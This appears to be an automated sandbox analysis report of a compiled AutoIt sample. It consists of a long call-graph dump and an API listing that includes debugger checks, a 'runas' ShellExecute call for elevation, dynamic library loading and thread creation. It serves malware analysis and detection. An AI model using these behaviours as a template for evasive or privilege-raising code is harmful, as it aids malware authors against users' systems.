87897 4295b1 87896->87897 87901 401b10 52 API calls 87901->87904 87904->87893 87904->87901 87911 444af8 87904->87911 87914 44b41c 87904->87914 87921 402780 87904->87921 87929 4022d0 87904->87929 87937 44c7dd 64 API calls 3 library calls 87904->87937 87906 410167 _wcslen 87905->87906 87907 4115d7 52 API calls 87906->87907 87908 41017e _wcscpy 87907->87908 87908->87858 87909->87873 87910->87875 87912 4115d7 52 API calls 87911->87912 87913 444b27 _memmove 87912->87913 87913->87904 87915 44b429 87914->87915 87916 4115d7 52 API calls 87915->87916 87917 44b440 87916->87917 87918 44b45e 87917->87918 87919 401b10 52 API calls 87917->87919 87918->87904 87920 44b453 87919->87920 87920->87904 87922 402790 moneypunct _memmove 87921->87922 87923 402827 87921->87923 87924 4115d7 52 API calls 87922->87924 87925 4115d7 52 API calls 87923->87925 87926 402797 87924->87926 87925->87922 87927 4115d7 52 API calls 87926->87927 87928 4027bd 87926->87928 87927->87928 87928->87904 87930 4022e0 87929->87930 87933 40239d 87929->87933 87931 4115d7 52 API calls 87930->87931 87932 402320 moneypunct 87930->87932 87930->87933 87931->87932 87932->87933 87934 4115d7 52 API calls 87932->87934 87933->87904 87934->87932 87935->87890 87936->87889 87937->87904 87939 402417 87938->87939 87943 402539 moneypunct 87938->87943 87940 4115d7 52 API calls 87939->87940 87939->87943 87941 402443 87940->87941 87942 4115d7 52 API calls 87941->87942 87944 4024b4 87942->87944 87943->86850 87944->87943 87946 4022d0 52 API calls 87944->87946 87967 402880 87944->87967 87946->87944 87952 401566 87947->87952 87948 401794 88019 40e9a0 90 API calls 87948->88019 87950 40167a 87953 4017c0 87950->87953 88020 45e737 90 API calls 3 library calls 87950->88020 87952->87948 87952->87950 87954 4010a0 52 API calls 87952->87954 87953->86852 87954->87952 87956 40bc70 52 API calls 87955->87956 87966 40d451 87956->87966 87957 40d50f 88023 410600 52 API calls 87957->88023 87959 427c01 88024 45e737 90 API calls 3 library calls 87959->88024 87960 40e0a0 52 API calls 87960->87966 87962 401b10 52 API calls 87962->87966 87963 40d519 87963->86855 87966->87957 87966->87959 87966->87960 87966->87962 87966->87963 88021 40f310 53 API calls 87966->88021 88022 40d860 91 API calls 87966->88022 87968 4115d7 52 API calls 87967->87968 87969 4028b3 87968->87969 87970 4115d7 52 API calls 87969->87970 88007 4028c5 moneypunct _memmove 87970->88007 87971 402780 52 API calls 88008 402b1e moneypunct 87971->88008 87972 427d62 87976 403350 52 API calls 87972->87976 87974 402bb6 88010 403060 53 API calls 87974->88010 87975 402aeb moneypunct 87975->87971 87979 42802b moneypunct 87975->87979 87985 427d6b 87976->87985 87978 402bca 87980 427f63 87978->87980 87981 402bd4 87978->87981 88016 460879 92 API calls 3 library calls 87980->88016 87984 402780 52 API calls 87981->87984 87982 403350 52 API calls 87982->88007 87987 402bdf 87984->87987 87989 427f2c 87985->87989 88013 403020 52 API calls _memmove 87985->88013 87987->87944 87988 427fd5 88017 460879 92 API calls 3 library calls 87988->88017 88015 460879 92 API calls 3 library calls 87989->88015 87992 427f48 87992->88008 87994 402f00 52 API calls 87994->88007 87996 427fe4 88002 402780 52 API calls 87996->88002 87997 427fa5 88003 402780 52 API calls 87997->88003 87998 428000 88018 460879 92 API calls 3 library calls 87998->88018 87999 4026f0 52 API calls 88001 402a85 CharUpperBuffW 87999->88001 88001->88007 88002->87992 88003->88008 88005 4115d7 52 API calls 88005->88007 88006 402780 52 API calls 88006->88007 88007->87972 88007->87974 88007->87975 88007->87982 88007->87988 88007->87989 88007->87994 88007->87997 88007->87998 88007->87999 88007->88005 88007->88006 88009 4031b0 63 API calls 88007->88009 88011 402f80 92 API calls _memmove 88007->88011 88012 402280 52 API calls 88007->88012 88014 4013a0 52 API calls 88007->88014 88008->87944 88009->88007 88010->87978 88011->88007 88012->88007 88013->87985 88014->88007 88015->87992 88016->87992 88017->87996 88018->88008 88019->87950 88020->87953 88021->87966 88022->87966 88023->87963 88024->87963 88025->86868 88026->86869 88028 42c5fe 88027->88028 88043 4091c6 88027->88043 88029 40bc70 52 API calls 88028->88029 88028->88043 88030 42c64e InterlockedIncrement 88029->88030 88031 42c665 88030->88031 88037 42c697 88030->88037 88033 42c672 InterlockedDecrement Sleep InterlockedIncrement 88031->88033 88031->88037 88032 42c737 InterlockedDecrement 88034 42c74a 88032->88034 88033->88031 88033->88037 88036 408f40 VariantClear 88034->88036 88035 42c731 88035->88032 88038 42c752 88036->88038 88037->88032 88037->88035 88185 408e80 88037->88185 88198 410c60 VariantClear moneypunct 88038->88198 88043->86931 88044 42c6db 88045 402160 52 API calls 88044->88045 88046 42c6e5 88045->88046 88047 45340c 85 API calls 88046->88047 88048 42c6f1 88047->88048 88195 40d200 52 API calls 2 library calls 88048->88195 88050 42c6fb 88196 465124 53 API calls 88050->88196 88052 42c715 88053 42c76a 88052->88053 88054 42c719 88052->88054 88055 401b10 52 API calls 88053->88055 88197 46fe32 VariantClear 88054->88197 88057 42c77e 88055->88057 88058 401980 53 API calls 88057->88058 88064 42c796 88058->88064 88059 42c812 88205 46fe32 VariantClear 88059->88205 88061 42c82a InterlockedDecrement 88206 46ff07 54 API calls 88061->88206 88063 42c864 88207 45e737 90 API calls 3 library calls 88063->88207 88064->88059 88064->88063 88199 40ba10 88064->88199 88065 42c9ec 88250 47d33e 381 API calls 88065->88250 88069 42c9fe 88251 46feb1 VariantClear VariantClear 88069->88251 88071 401980 53 API calls 88078 42c849 88071->88078 88072 408f40 VariantClear 88072->88078 88073 42ca08 88076 401b10 52 API calls 88073->88076 88074 42c874 88077 408f40 VariantClear 88074->88077 88084 42ca59 88074->88084 88075 402780 52 API calls 88075->88078 88079 42ca15 88076->88079 88080 42c891 88077->88080 88078->88065 88078->88071 88078->88072 88078->88075 88209 40a780 88078->88209 88081 40c2c0 52 API calls 88079->88081 88208 410c60 VariantClear moneypunct 88080->88208 88081->88074 88084->88084 88086 40afc4 88085->88086 88087 40b156 88085->88087 88088 40afd5 88086->88088 88089 42d1e3 88086->88089 88262 45e737 90 API calls 3 library calls 88087->88262 88093 40a780 242 API calls 88088->88093 88110 40b11a moneypunct 88088->88110 88263 45e737 90 API calls 3 library calls 88089->88263 88092 42d1f8 88098 408f40 VariantClear 88092->88098 88096 40b00a 88093->88096 88094 40b143 88094->86931 88096->88092 88099 40b012 88096->88099 88097 42d4db 88097->88097 88098->88094 88100 40b04a 88099->88100 88101 42d231 VariantClear 88099->88101 88108 40b094 moneypunct 88099->88108 88103 40b05c moneypunct 88100->88103 88264 40e270 VariantClear moneypunct 88100->88264 88101->88103 88102 42d45a VariantClear 88102->88110 88107 4115d7 52 API calls 88103->88107 88103->88108 88104 40b108 88104->88110 88265 40e270 VariantClear moneypunct 88104->88265 88107->88108 88108->88104 88109 42d425 moneypunct 88108->88109 88109->88102 88109->88110 88110->88094 88266 45e737 90 API calls 3 library calls 88110->88266 88112 408fff 88111->88112 88123 40900d 88111->88123 88267 403ea0 52 API calls __cinit 88112->88267 88115 42c3f6 88270 45e737 90 API calls 3 library calls 88115->88270 88117 42c44a 88272 45e737 90 API calls 3 library calls 88117->88272 88118 40a780 242 API calls 88118->88123 88121 42c47b 88273 451b42 61 API calls 88121->88273 88123->88115 88123->88117 88123->88118 88123->88121 88124 42c4cb 88123->88124 88125 42c564 88123->88125 88129 42c548 88123->88129 88130 409112 88123->88130 88132 42c528 88123->88132 88135 4090df 88123->88135 88136 4090ea 88123->88136 88145 4090f2 moneypunct 88123->88145 88269 4534e3 52 API calls 88123->88269 88271 40c4e0 242 API calls 88123->88271 88275 47faae 281 API calls 88124->88275 88128 408f40 VariantClear 88125->88128 88126 42c491 88126->88145 88274 45e737 90 API calls 3 library calls 88126->88274 88128->88145 88278 45e737 90 API calls 3 library calls 88129->88278 88130->88129 88138 40912b 88130->88138 88277 45e737 90 API calls 3 library calls 88132->88277 88133 42c4da 88133->88145 88276 45e737 90 API calls 3 library calls 88133->88276 88135->88136 88140 408e80 VariantClear 88135->88140 88141 408f40 VariantClear 88136->88141 88138->88145 88268 403e10 53 API calls 88138->88268 88140->88136 88141->88145 88143 40914b 88144 408f40 VariantClear 88143->88144 88144->88145 88145->86931 88279 408d90 88146->88279 88148 429778 88308 410c60 VariantClear moneypunct 88148->88308 88150 429780 88151 408cf9 88151->88148 88152 42976c 88151->88152 88154 408d2d 88151->88154 88307 45e737 90 API calls 3 library calls 88152->88307 88295 403d10 88154->88295 88157 408d71 moneypunct 88157->86931 88158 408f40 VariantClear 88159 408d45 moneypunct 88158->88159 88159->88157 88159->88158 88160->86931 88161->86931 88162->86931 88163->86931 88164->86879 88165->86885 88166->86931 88167->86931 88168->86931 88169->86931 88170->86935 88171->86935 88172->86935 88173->86935 88174->86935 88175->86935 88176->86935 88178 403cdf 88177->88178 88179 408f40 VariantClear 88178->88179 88180 403ce7 88179->88180 88180->86923 88181->86935 88182->86935 88183->86931 88184->86876 88186 408e88 88185->88186 88188 408e94 88185->88188 88187 408f40 VariantClear 88186->88187 88187->88188 88189 45340c 88188->88189 88190 453439 88189->88190 88191 453419 88189->88191 88190->88044 88192 45342f 88191->88192 88252 4531b1 85 API calls 5 library calls 88191->88252 88192->88044 88194 453425 88194->88044 88195->88050 88196->88052 88197->88035 88198->88043 88200 40ba49 88199->88200 88201 40ba1b moneypunct _memmove 88199->88201 88203 4115d7 52 API calls 88200->88203 88202 4115d7 52 API calls 88201->88202 88204 40ba22 88202->88204 88203->88201 88204->88064 88205->88061 88206->88078 88207->88074 88208->88043 88210 40a7a6 88209->88210 88211 40ae8c 88209->88211 88213 4115d7 52 API calls 88210->88213 88253 41130a 51 API calls __cinit 88211->88253 88247 40a7c6 moneypunct _memmove 88213->88247 88214 40a86d 88215 40abd1 88214->88215 88234 40a878 moneypunct 88214->88234 88258 45e737 90 API calls 3 library calls 88215->88258 88216 4115d7 52 API calls 88216->88247 88217 401b10 52 API calls 88217->88247 88219 40b5f0 89 API calls 88219->88247 88220 408e80 VariantClear 88220->88247 88221 42b791 VariantClear 88221->88247 88222 42ba2d VariantClear 88222->88247 88223 408f40 VariantClear 88223->88234 88224 40e270 VariantClear 88224->88247 88225 42b459 VariantClear 88225->88247 88226 40a884 moneypunct 88226->88078 88227 40bc10 53 API calls 88227->88247 88228 408cc0 235 API calls 88228->88247 88229 42b6f6 VariantClear 88229->88247 88231 42bc5b 88231->88078 88232 4530c9 VariantClear 88232->88247 88233 42bb6a 88261 44b92d VariantClear 88233->88261 88234->88223 88234->88226 88235 42bbf5 88259 45e737 90 API calls 3 library calls 88235->88259 88237 4115d7 52 API calls 88240 42b5b3 VariantInit VariantCopy 88237->88240 88239 408f40 VariantClear 88239->88247 88242 42b5d7 VariantClear 88240->88242 88240->88247 88242->88247 88244 42bc37 88260 45e737 90 API calls 3 library calls 88244->88260 88247->88214 88247->88215 88247->88216 88247->88217 88247->88219 88247->88220 88247->88221 88247->88222 88247->88224 88247->88225 88247->88227 88247->88228 88247->88229 88247->88232 88247->88233 88247->88235 88247->88237 88247->88239 88247->88244 88254 45308a 53 API calls 88247->88254 88255 470870 52 API calls 88247->88255 88256 457f66 87 API calls __write_nolock 88247->88256 88257 472f47 127 API calls 88247->88257 88248 42bc48 88248->88233 88250->88069 88251->88073 88252->88194 88253->88247 88254->88247 88255->88247 88256->88247 88257->88247 88258->88233 88259->88233 88260->88248 88261->88231 88262->88089 88263->88092 88264->88103 88265->88110 88266->88097 88267->88123 88268->88143 88269->88123 88270->88145 88271->88123 88272->88145 88273->88126 88274->88145 88275->88133 88276->88145 88277->88145 88278->88125 88280 4289d2 88279->88280 88281 408db3 88279->88281 88313 45e737 90 API calls 3 library calls 88280->88313 88309 40bec0 88281->88309 88284 408dc9 88285 4289e5 88284->88285 88287 428a05 88284->88287 88288 40ba10 52 API calls 88284->88288 88290 40a780 242 API calls 88284->88290 88291 408e64 88284->88291 88293 408f40 VariantClear 88284->88293 88294 408e5a 88284->88294 88314 45e737 90 API calls 3 library calls 88285->88314 88289 408f40 VariantClear 88287->88289 88288->88284 88289->88294 88290->88284 88292 408f40 VariantClear 88291->88292 88292->88294 88293->88284 88294->88151 88296 408f40 VariantClear 88295->88296 88297 403d20 88296->88297 88298 403cd0 VariantClear 88297->88298 88299 403d4d 88298->88299 88316 4813fa 88299->88316 88326 46e1a6 88299->88326 88374 4755ad 88299->88374 88377 474e7f 88299->88377 88393 46ae3d 88299->88393 88398 475596 88299->88398 88300 403d76 88300->88148 88300->88159 88307->88148 88308->88150 88310 40bed0 88309->88310 88311 40bef2 88310->88311 88315 45e737 90 API calls 3 library calls 88310->88315 88311->88284 88313->88285 88314->88287 88315->88311 88317 45340c 85 API calls 88316->88317 88318 481438 88317->88318 88319 402880 95 API calls 88318->88319 88320 48143f 88319->88320 88321 481465 88320->88321 88322 40a780 242 API calls 88320->88322 88325 481469 88321->88325 88401 40e710 53 API calls 88321->88401 88322->88321 88324 4814a4 88324->88300 88325->88300 88327 46e1c0 88326->88327 88465 4533eb 88327->88465 88329 46e483 88329->88300 88330 46e1dc 88330->88329 88331 46e2e7 88330->88331 88332 46e1e9 88330->88332 88334 40f760 128 API calls 88331->88334 88333 45340c 85 API calls 88332->88333 88335 46e1f4 _wcscpy _wcschr 88333->88335 88336 46e2f7 88334->88336 88348 46e216 _wcscat _wcscpy 88335->88348 88351 46e248 _wcscat 88335->88351 88337 46e2fc 88336->88337 88338 46e30d 88336->88338 88340 403cd0 VariantClear 88337->88340 88339 45340c 85 API calls 88338->88339 88341 46e332 88339->88341 88342 46e2c8 88340->88342 88343 413a0e __wsplitpath 46 API calls 88341->88343 88344 408f40 VariantClear 88342->88344 88353 46e338 _wcscat _wcscpy 88343->88353 88345 46e2d0 88344->88345 88345->88300 88346 45340c 85 API calls 88347 46e264 _wcscpy 88346->88347 88469 433998 GetFileAttributesW 88347->88469 88349 45340c 85 API calls 88348->88349 88349->88351 88351->88346 88352 46e27d _wcslen 88352->88342 88354 45340c 85 API calls 88352->88354 88356 45340c 85 API calls 88353->88356 88355 46e2b0 88354->88355 88470 44bd27 80 API calls 4 library calls 88355->88470 88358 46e3e3 88356->88358 88402 433784 88358->88402 88359 46e2bd 88359->88329 88359->88342 88361 46e3e9 88409 4339fa 88361->88409 88511 475077 88374->88511 88376 4755c0 88376->88300 88378 474e9b 88377->88378 88379 474e9f 88378->88379 88382 474ecf 88378->88382 88380 408f40 VariantClear 88379->88380 88381 474ea7 88380->88381 88381->88300 88383 474f28 88382->88383 88384 474ef8 88382->88384 88385 474f54 88383->88385 88387 408f40 VariantClear 88383->88387 88386 408f40 VariantClear 88384->88386 88610 468848 88385->88610 88388 474f00 88386->88388 88387->88385 88388->88300 88390 474f89 88391 408f40 VariantClear 88390->88391 88392 474fa2 88391->88392 88392->88300 88394 4680ed 55 API calls 88393->88394 88395 46ae50 88394->88395 88396 408f40 VariantClear 88395->88396 88397 46ae65 88396->88397 88397->88300 88399 475077 126 API calls 88398->88399 88400 4755a9 88399->88400 88400->88300 88401->88324 88403 433791 _wcschr __write_nolock 88402->88403 88404 4337a8 _wcscpy 88403->88404 88405 413a0e __wsplitpath 46 API calls 88403->88405 88404->88361 88406 4337dd 88405->88406 88407 413a0e __wsplitpath 46 API calls 88406->88407 88466 453404 88465->88466 88467 4533f8 88465->88467 88466->88330 88467->88466 88510 4531b1 85 API calls 5 library calls 88467->88510 88469->88352 88470->88359 88510->88466 88512 4533eb 85 API calls 88511->88512 88513 4750b8 88512->88513 88514 4750ee 88513->88514 88515 475129 88513->88515 88517 408f40 VariantClear 88514->88517 88562 4646e0 88515->88562 88522 4750f5 88517->88522 88518 47515e 88519 475162 88518->88519 88556 47518e 88518->88556 88520 408f40 VariantClear 88519->88520 88551 475169 88520->88551 88521 475357 88523 475365 88521->88523 88524 4754ea 88521->88524 88522->88376 88596 44b3ac 57 API calls 88523->88596 88602 464812 91 API calls 88524->88602 88528 4754fc 88529 475374 88528->88529 88531 475508 88528->88531 88575 430d31 88529->88575 88530 4533eb 85 API calls 88530->88556 88532 408f40 VariantClear 88531->88532 88535 47550f 88532->88535 88535->88551 88536 475388 88539 475480 88541 408f40 VariantClear 88539->88541 88541->88551 88549 4754b5 88550 408f40 VariantClear 88549->88550 88550->88551 88551->88376 88556->88521 88556->88530 88556->88539 88556->88549 88556->88556 88594 436299 52 API calls 2 library calls 88556->88594 88595 463ad5 64 API calls __wcsicoll 88556->88595 88605 4536f7 53 API calls 88562->88605 88564 4646fc 88606 4426cd 59 API calls _wcslen 88564->88606 88566 464711 88568 40bc70 52 API calls 88566->88568 88574 46474b 88566->88574 88569 46472c 88568->88569 88607 461465 52 API calls _memmove 88569->88607 88571 464741 88573 40c600 52 API calls 88571->88573 88572 464793 88572->88518 88573->88574 88574->88572 88608 463ad5 64 API calls __wcsicoll 88574->88608 88576 430db2 88575->88576 88577 430d54 88575->88577 88576->88536 88578 4115d7 52 API calls 88577->88578 88594->88556 88595->88556 88596->88529 88602->88528 88605->88564 88606->88566 88607->88571 88608->88572 88613 4684dc 88610->88613 88612 468867 88612->88390 88689 45360e 88613->88689 88615 468507 88616 468527 88615->88616 88617 46850d 88615->88617 88620 468582 88616->88620 88621 468562 88616->88621 88618 408f40 VariantClear 88617->88618 88619 468512 88618->88619 88619->88612 88623 468586 88620->88623 88624 4685a2 88620->88624 88622 408f40 VariantClear 88621->88622 88627 468567 88622->88627 88709 46822a 90 API calls 2 library calls 88623->88709 88626 468644 88624->88626 88629 468623 88624->88629 88630 4685bf 88624->88630 88631 468675 88626->88631 88632 46864b 88626->88632 88627->88612 88628 468599 88628->88612 88629->88626 88637 468627 88629->88637 88630->88626 88634 4685c7 88630->88634 88635 4686e8 88631->88635 88636 468679 88631->88636 88633 468658 88632->88633 88710 44b3ac 57 API calls 88632->88710 88639 408f40 VariantClear 88633->88639 88694 4680ed 88634->88694 88641 46880e 88635->88641 88645 4687f2 88635->88645 88646 4686fc 88635->88646 88647 46874a 88635->88647 88648 468799 88635->88648 88642 4686b9 88636->88642 88667 468681 88636->88667 88643 453132 53 API calls 88637->88643 88644 468661 88639->88644 88641->88612 88651 408f40 VariantClear 88642->88651 88649 468630 _memmove 88643->88649 88644->88612 88654 4687ff 88645->88654 88714 443006 57 API calls 88645->88714 88653 468709 88646->88653 88711 443006 57 API calls 88646->88711 88652 468757 88647->88652 88712 443006 57 API calls 88647->88712 88650 4687a6 88648->88650 88713 443006 57 API calls 88648->88713 88649->88612 88656 4687cf 88650->88656 88657 4687af 88650->88657 88658 4686d1 88651->88658 88665 468761 88652->88665 88666 46877d 88652->88666 88661 468712 88653->88661 88662 46872e 88653->88662 88663 408f40 VariantClear 88654->88663 88670 408f40 VariantClear 88656->88670 88669 408f40 VariantClear 88657->88669 88658->88612 88671 408f40 VariantClear 88661->88671 88663->88641 88667->88641 88668 408f40 VariantClear 88667->88668 88676 4686a2 88668->88676 88674 4685d0 88682 4680ed 55 API calls 88674->88682 88676->88612 88684 4685ec _memmove 88682->88684 88690 453623 88689->88690 88691 45340c 85 API calls 88690->88691 88692 45365a 88690->88692 88693 4114ab __wcsicoll 58 API calls 88690->88693 88691->88690 88692->88615 88693->88690 88695 468100 88694->88695 88696 4680fa 88694->88696 88695->88674 88715 467ac4 88696->88715 88709->88628 88710->88633 88711->88653 88712->88652 88713->88650 88714->88654 88716 467bb8 88715->88716 88717 467adc 88715->88717 88716->88695 88718 467c1d 88717->88718 88719 467c16 88717->88719 88720 467b90 88717->88720 88729 467aed 88717->88729 88735 42d154 88739 480a8d 88735->88739 88737 42d161 88738 480a8d 242 API calls 88737->88738 88738->88737 88740 480ae4 88739->88740 88741 480b26 88739->88741 88743 480aeb 88740->88743 88744 480b15 88740->88744 88742 40bc70 52 API calls 88741->88742 88762 480b2e 88742->88762 88745 480aee 88743->88745 88746 480b04 88743->88746 88772 4805bf 242 API calls 88744->88772 88745->88741 88748 480af3 88745->88748 88771 47fea2 242 API calls __itow_s 88746->88771 88770 47f135 242 API calls 88748->88770 88751 40e0a0 52 API calls 88751->88762 88753 408f40 VariantClear 88756 481156 88753->88756 88754 40c2c0 52 API calls 88754->88762 88755 480aff 88755->88753 88757 408f40 VariantClear 88756->88757 88758 48115e 88757->88758 88758->88737 88759 401980 53 API calls 88759->88762 88761 40e710 53 API calls 88761->88762 88762->88751 88762->88754 88762->88755 88762->88759 88762->88761 88763 408e80 VariantClear 88762->88763 88764 40a780 242 API calls 88762->88764 88766 480ff5 88762->88766 88773 45377f 52 API calls 88762->88773 88774 45e951 53 API calls 88762->88774 88775 40e830 53 API calls 88762->88775 88776 47925f 53 API calls 88762->88776 88777 47fcff 242 API calls 88762->88777 88763->88762 88764->88762 88778 45e737 90 API calls 3 library calls 88766->88778 88770->88755 88771->88755 88772->88755 88773->88762 88774->88762 88775->88762 88776->88762 88777->88762 88778->88755 88779 a823b0 88794 a80000 88779->88794 88781 a82481 88797 a822a0 88781->88797 88800 a834b0 GetPEB 88794->88800 88796 a8068b 88796->88781 88798 a822a9 Sleep 88797->88798 88799 a822b7 88798->88799 88801 a834da 88800->88801 88801->88796 88802 425b2b 88807 40f000 88802->88807 88806 425b3a 88808 4115d7 52 API calls 88807->88808 88809 40f007 88808->88809 88810 4276ea 88809->88810 88816 40f030 88809->88816 88815 41130a 51 API calls __cinit 88815->88806 88817 40f039 88816->88817 88818 40f01a 88816->88818 88846 41130a 51 API calls __cinit 88817->88846 88820 40e500 88818->88820 88821 40bc70 52 API calls 88820->88821 88822 40e515 GetVersionExW 88821->88822 88823 402160 52 API calls 88822->88823 88824 40e557 88823->88824 88847 40e660 88824->88847 88830 427674 88834 4276c6 GetSystemInfo 88830->88834 88832 40e5e0 88835 4276d5 GetSystemInfo 88832->88835 88861 40efd0 88832->88861 88833 40e5cd GetCurrentProcess 88868 40ef20 LoadLibraryA GetProcAddress 88833->88868 88834->88835 88839 40e629 88865 40ef90 88839->88865 88842 40e641 FreeLibrary 88843 40e644 88842->88843 88844 40e653 FreeLibrary 88843->88844 88845 40e656 88843->88845 88844->88845 88845->88815 88846->88818 88848 40e667 88847->88848 88849 42761d 88848->88849 88850 40c600 52 API calls 88848->88850 88851 40e55c 88850->88851 88852 40e680 88851->88852 88853 40e687 88852->88853 88854 427616 88853->88854 88855 40c600 52 API calls 88853->88855 88856 40e566 88855->88856 88856->88830 88857 40ef60 88856->88857 88858 40e5c8 88857->88858 88859 40ef66 LoadLibraryA 88857->88859 88858->88832 88858->88833 88859->88858 88860 40ef77 GetProcAddress 88859->88860 88860->88858 88862 40e620 88861->88862 88863 40efd6 LoadLibraryA 88861->88863 88862->88834 88862->88839 88863->88862 88864 40efe7 GetProcAddress 88863->88864 88864->88862 88869 40efb0 LoadLibraryA GetProcAddress 88865->88869 88867 40e632 GetNativeSystemInfo 88867->88842 88867->88843 88868->88832 88869->88867 88870 425b5e 88875 40c7f0 88870->88875 88874 425b6d 88910 40db10 52 API calls 88875->88910 88877 40c82a 88911 410ab0 6 API calls 88877->88911 88879 40c86d 88880 40bc70 52 API calls 88879->88880 88881 40c877 88880->88881 88882 40bc70 52 API calls 88881->88882 88883 40c881 88882->88883 88884 40bc70 52 API calls 88883->88884 88885 40c88b 88884->88885 88886 40bc70 52 API calls 88885->88886 88887 40c8d1 88886->88887 88888 40bc70 52 API calls 88887->88888 88889 40c991 88888->88889 88912 40d2c0 52 API calls 88889->88912 88891 40c99b 88913 40d0d0 53 API calls 88891->88913 88893 40c9c1 88894 40bc70 52 API calls 88893->88894 88895 40c9cb 88894->88895 88914 40e310 53 API calls 88895->88914 88897 40ca28 88898 408f40 VariantClear 88897->88898 88899 40ca30 88898->88899 88900 408f40 VariantClear 88899->88900 88901 40ca38 GetStdHandle 88900->88901 88902 429630 88901->88902 88903 40ca87 88901->88903 88902->88903 88904 429639 88902->88904 88909 41130a 51 API calls __cinit 88903->88909 88915 4432c0 57 API calls 88904->88915 88906 429641 88916 44b6ab CreateThread 88906->88916 88908 42964f CloseHandle 88908->88903 88909->88874 88910->88877 88911->88879 88912->88891 88913->88893 88914->88897 88915->88906 88916->88908 88917 44b5cb 58 API calls 88916->88917 88918 425b6f 88923 40dc90 88918->88923 88922 425b7e 88924 40bc70 52 API calls 88923->88924 88925 40dd03 88924->88925 88932 40f210 88925->88932 88927 40dd96 88928 426a97 88927->88928 88930 40ddb7 88927->88930 88935 40dc00 52 API calls 2 library calls 88927->88935 88931 41130a 51 API calls __cinit 88930->88931 88931->88922 88936 40f250 RegOpenKeyExW 88932->88936 88934 40f230 88934->88927 88935->88927 88937 425e17 88936->88937 88938 40f275 RegQueryValueExW 88936->88938 88937->88934 88939 40f2c3 RegCloseKey 88938->88939 88940 40f298 88938->88940 88939->88934 88941 40f2a9 RegCloseKey 88940->88941 88942 425e1d 88940->88942 88941->88934

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                      • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                      • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                    • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                    • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                      • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                    • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                    • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                      • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                      • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                      • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                      • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                      • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                    Strings
                                                    • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                    • runas, xrefs: 0042E2AD, 0042E2DC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                    • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                    • API String ID: 2495805114-3383388033
                                                    • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                    • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                    • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                    • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
